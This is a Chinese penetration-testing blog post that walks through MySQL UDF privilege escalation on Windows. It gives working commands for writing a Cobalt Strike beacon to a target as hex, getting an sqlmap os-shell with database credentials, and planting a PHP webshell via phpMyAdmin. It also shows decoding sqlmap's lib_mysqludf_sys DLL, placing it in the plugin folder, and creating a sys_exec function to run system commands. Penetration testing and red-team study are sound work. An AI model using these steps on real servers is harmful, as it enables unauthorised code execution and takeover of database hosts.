<!doctype html>
<html lang="zh"><head><meta charset="utf-8"><meta name="generator" content="Hexo 4.2.1"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><title>温故——MySQL数据库UDF提权 - x51&#039;BLOG</title><meta description="update：2019-05-13 遇到一个案例，在内网扫描到MySQL弱口令（root账户），连接数据库后将beacon以16进制的形式写入到指定目录（目录可通过sqlmap os-shell获得），可在本地MySQL执行： 1select hex(load_file(&amp;#39;&amp;#x2F;root&amp;#x2F;beacon.exe&amp;#39;)) into dumpfile &amp;#39;root&amp;#x2F;beacon.txt&amp;#39;; 然后在目标MySQL"><meta property="og:type" content="blog"><meta property="og:title" content="温故——MySQL数据库UDF提权"><meta property="og:url" content="https://utf32.com/2019/02/23/%E6%B8%A9%E6%95%85%E2%80%94%E2%80%94MySQL%E6%95%B0%E6%8D%AE%E5%BA%93UDF%E6%8F%90%E6%9D%83/"><meta property="og:site_name" content="x51&#039;BLOG"><meta property="og:description" content="update：2019-05-13 遇到一个案例，在内网扫描到MySQL弱口令（root账户），连接数据库后将beacon以16进制的形式写入到指定目录（目录可通过sqlmap os-shell获得），可在本地MySQL执行： 1select hex(load_file(&amp;#39;&amp;#x2F;root&amp;#x2F;beacon.exe&amp;#39;)) into dumpfile &amp;#39;root&amp;#x2F;beacon.txt&amp;#39;; 然后在目标MySQL"><meta property="og:locale" content="zh_CN"><meta property="og:image" content="https://utf32.com/images/pasted-15.png"><meta property="og:image" content="https://utf32.com/images/pasted-16.png"><meta property="og:image" content="https://utf32.com/images/pasted-19.png"><meta property="og:image" content="https://utf32.com/images/pasted-18.png"><meta property="og:image" content="https://utf32.com/images/pasted-20.png"><meta property="og:image" content="https://utf32.com/images/pasted-21.png"><meta property="og:image" content="https://utf32.com/images/pasted-22.png"><meta property="og:image" content="https://utf32.com/images/pasted-23.png"><meta property="og:image" content="https://utf32.com/images/pasted-24.png"><meta property="og:image" content="https://utf32.com/images/pasted-25.png"><meta property="og:image" content="https://utf32.com/images/pasted-26.png"><meta property="article:published_time" content="2019-02-23T01:03:53.000Z"><meta property="article:modified_time" content="2020-06-27T11:24:18.686Z"><meta property="article:author" content="xsl"><meta property="article:tag" content="x51"><meta property="article:tag" content="渗透"><meta property="article:tag" content="攻防"><meta property="article:tag" content="红蓝对抗"><meta property="article:tag" content="redteam"><meta property="article:tag" content="x51&#039;blog"><meta property="article:tag" content="渗透测试"><meta property="article:tag" content="网络安全"><meta property="twitter:card" content="summary"><meta property="twitter:image" content="/images/pasted-15.png"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"https://utf32.com/2019/02/23/%E6%B8%A9%E6%95%85%E2%80%94%E2%80%94MySQL%E6%95%B0%E6%8D%AE%E5%BA%93UDF%E6%8F%90%E6%9D%83/"},"headline":"x51'BLOG","image":["https://utf32.com/images/pasted-15.png","https://utf32.com/images/pasted-16.png","https://utf32.com/images/pasted-19.png","https://utf32.com/images/pasted-18.png","https://utf32.com/images/pasted-20.png","https://utf32.com/images/pasted-21.png","https://utf32.com/images/pasted-22.png","https://utf32.com/images/pasted-23.png","https://utf32.com/images/pasted-24.png","https://utf32.com/images/pasted-25.png","https://utf32.com/images/pasted-26.png"],"datePublished":"2019-02-23T01:03:53.000Z","dateModified":"2020-06-27T11:24:18.686Z","author":{"@type":"Person","name":"xsl"},"description":"update：2019-05-13 遇到一个案例，在内网扫描到MySQL弱口令（root账户），连接数据库后将beacon以16进制的形式写入到指定目录（目录可通过sqlmap os-shell获得），可在本地MySQL执行： 1select hex(load_file(&#39;&#x2F;root&#x2F;beacon.exe&#39;)) into dumpfile &#39;root&#x2F;beacon.txt&#39;; 然后在目标MySQL"}</script><link rel="canonical" href="https://utf32.com/2019/02/23/%E6%B8%A9%E6%95%85%E2%80%94%E2%80%94MySQL%E6%95%B0%E6%8D%AE%E5%BA%93UDF%E6%8F%90%E6%9D%83/"><link rel="icon" href="/img/favicon.svg"><link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.12.0/css/all.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@9.12.0/styles/atom-one-light.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Ubuntu:wght@400;600&amp;family=Source+Code+Pro"><link rel="stylesheet" href="/css/default.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><!--!--><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/css/justifiedGallery.min.css"><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script></head><body class="is-1-column"><nav class="navbar navbar-main"><div class="container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/">x51</a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">首页</a><a class="navbar-item" href="/archives">文章</a><a class="navbar-item" href="/categories">分类</a><a class="navbar-item" href="/tags">标签</a><a class="navbar-item" href="/about">关于</a></div><div class="navbar-end"><a class="navbar-item" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/x51"><i class="fab fa-github"></i></a><a class="navbar-item search" title="搜索" href="javascript:;"><i class="fas fa-search"></i></a></div></div></div></nav><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-12"><div class="card"><article class="card-content article" role="article"><div class="article-meta size-small is-uppercase level is-mobile"><div class="level-left"><time class="level-item" dateTime="2019-02-23T01:03:53.000Z" title="2019-02-23T01:03:53.000Z">2019-02-23</time><span class="level-item"> xsl </span></div></div><h1 class="title is-3 is-size-4-mobile">温故——MySQL数据库UDF提权</h1><div class="content"><p>update：2019-05-13</p>
<p>遇到一个案例，在内网扫描到MySQL弱口令（root账户），连接数据库后将beacon以16进制的形式写入到指定目录（目录可通过sqlmap os-shell获得），可在本地MySQL执行：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="keyword">hex</span>(<span class="keyword">load_file</span>(<span class="string">'/root/beacon.exe'</span>)) <span class="keyword">into</span> <span class="keyword">dumpfile</span> <span class="string">'root/beacon.txt'</span>;</span><br></pre></td></tr></table></figure>
<p>然后在目标MySQL执行：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="number">0</span>x&#123;beacon.txt&#125; <span class="keyword">into</span> <span class="keyword">dumpfile</span> <span class="string">'C:\\path\\beacon.exe'</span>;</span><br></pre></td></tr></table></figure>
<p>最后在sqlmap的os-shell上运行beacon即可；</p>
<p>注：通过该方法写入hex数据时注意路径正确，写入文件不易过大，耗时较久；</p>
<p>使用sqlmap也可以实现udf提权，在一定情况下可选；</p>
<figure class="highlight dockerfile"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -d <span class="string">"mysql://user:pass@192.168.0.1:3306/testdb"</span> --os-<span class="keyword">shell</span></span><br></pre></td></tr></table></figure>
<p>通过执行记录可看到仍然是上传dll文件后创建sys_evel和sys_exec函数来执行系统命令；</p>
<p>======================</p>
<p>一个PHP站点，安装了phpmyadmin，root口令已拿到，首先想到的是写shell，然后看webshell权限情况是否需要提权。<br>数据库一些基本参数：<br><img src="/images/pasted-15.png" alt="upload successful"><br>默认安装位置在C盘program files路径（这个路径普通权限无法写入，后续提权会遇到），猜测网站路径也应该是默认部署，即C:/intpub/wwwroot/，可直接向这个路径写文件验证一下，不过后来手工试了一下phpinfo存在，验证路径正确。</p>
<p><img src="/images/pasted-16.png" alt="upload successful"><br>贴一张mysql文件操作的笔记：<br><img src="/images/pasted-19.png" alt="upload successful"><br>写webshell：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="string">"..."</span> intofile <span class="string">"C:/intpub/wwwroot/shell.php"</span>;</span><br></pre></td></tr></table></figure>
<p>此处需注意路径中“/”或者“\\”才可以，不要直接复制phpinfo中的“\”。<br>看一下webshell权限：<br><img src="/images/pasted-18.png" alt="upload successful"><br>（SeImpersonatePrivilege开启，看了下端口开放情况应当可以用另一种方法提权，暂且放置）</p>
<h6 id="UDF"><a href="#UDF" class="headerlink" title="UDF"></a>UDF</h6><p>UDF即用户自定义函数，一个包含执行函数的动态链接库，这个dll文件（Windows环境）在SQLMAP安装目录有，x86和x64环境各一份 ：<br><img src="/images/pasted-20.png" alt="upload successful"><br>需要先做一下解码操作：</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python <span class="regexp">/usr/</span>share<span class="regexp">/sqlmap/</span>extra<span class="regexp">/cloak/</span>cloak.py -d -i <span class="regexp">/usr/</span>share<span class="regexp">/sqlmap/u</span>df<span class="regexp">/mysql/</span>windows<span class="regexp">/32/</span>lib_mysqludf_sys.dll_</span><br></pre></td></tr></table></figure>
<p>会在同目录生成一份可用dll文件</p>
<p><img src="/images/pasted-21.png" alt="upload successful"><br>关于选择平台位数的问题，需要在MySQL中确认：</p>
<p><img src="/images/pasted-22.png" alt="upload successful"><br>这儿要以version_compile_os为准，选64位的dll。<br>如果选择错误会报如下错误：</p>
<p><img src="/images/pasted-23.png" alt="upload successful"></p>
<p>准备好udf64.dll文件之后，上传目录也需要选择正确的路径：<br>1、MySQL&gt;5.1，需要放置在mysql安装目录下的plugin文件夹；<br>2、MySQL&lt;5.1，需要放置在system32目录下<br>查看plugin完整路径：<br><img src="/images/pasted-24.png" alt="upload successful"><br>该目录webshell没有写权限，利用MySQL的load_file函数  </p>
<p><img src="/images/pasted-25.png" alt="upload successful"><br>创建函数sys_exec：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">create</span> <span class="keyword">function</span> sys_exec <span class="keyword">returns</span> <span class="keyword">string</span> <span class="keyword">soname</span> <span class="string">"udf64"</span>;</span><br></pre></td></tr></table></figure>
<p>创建成功之后即可直接select sys_exec来使用；</p>
<p><img src="/images/pasted-26.png" alt="upload successful"><br>测试完成之后删除函数，删除dll文件；</p>
<figure class="highlight n1ql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">drop</span> <span class="keyword">function</span> sys_exec;</span><br></pre></td></tr></table></figure></div><!--!--></article></div><div class="card"><div class="card-content"><h3 class="menu-label has-text-centered">喜欢这篇文章？打赏一下作者吧</h3><div class="buttons is-centered"><a class="button is-success donate"><span class="icon is-small"><i class="fab fa-weixin"></i></span><span>微信</span><span class="qrcode"><img src="/source/images/zsm.png" alt="微信"></span></a></div></div></div><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/2019/02/26/%E5%8D%9A%E5%AE%A2%E8%BF%81%E7%A7%BB%E8%AE%B0%E5%BD%95/"><i class="level-item fas fa-chevron-left"></i><span class="level-item">博客迁移记录</span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/2019/02/14/%E5%AE%89%E5%85%A8%E6%B5%8B%E8%AF%95%E4%B8%AD%E5%A6%82%E4%BD%95%E5%A4%84%E7%90%86%E5%89%8D%E7%AB%AF%E5%8A%A0%E5%AF%86/"><span class="level-item">安全测试中如何处理前端加密？</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><!--!--></div><!--!--><!--!--></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/">x51</a><p class="size-small"><span>&copy; 2020 xsl</span>  Powered by <a href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank" rel="noopener">Icarus</a></p></div><div class="level-end"><div class="field has-addons"><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/ppoffice/hexo-theme-icarus"><i class="fab fa-github"></i></a></p></div></div></div></div></footer><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script><script>moment.locale("zh-CN");</script><script>var IcarusThemeSettings = {
            site: {
                url: 'https://utf32.com',
                external_link: {"enable":false,"exclude":[]}
            },
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script><script src="/js/animation.js"></script><a id="back-to-top" title="回到顶端" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script src="/js/back_to_top.js" defer></script><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/js/lightgallery.min.js" defer></script><script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js" defer></script><script>window.addEventListener("load", () => {
            if (typeof $.fn.lightGallery === 'function') {
                $('.article').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof $.fn.justifiedGallery === 'function') {
                if ($('.justified-gallery > p > .gallery-item').length) {
                    $('.justified-gallery > p > .gallery-item').unwrap();
                }
                $('.justified-gallery').justifiedGallery();
            }
        });</script><!--!--><!--!--><!--!--><script src="/js/main.js" defer></script><div class="searchbox"><div class="searchbox-container"><div class="searchbox-header"><div class="searchbox-input-container"><input class="searchbox-input" type="text" placeholder="想要查找什么..."></div><a class="searchbox-close" href="javascript:;">×</a></div><div class="searchbox-body"></div></div></div><script src="/js/insight.js" defer></script><script>document.addEventListener('DOMContentLoaded', function () {
            loadInsight({"contentUrl":"/content.json"}, {"hint":"想要查找什么...","untitled":"(无标题)","posts":"文章","pages":"页面","categories":"分类","tags":"标签"});
        });</script></body></html>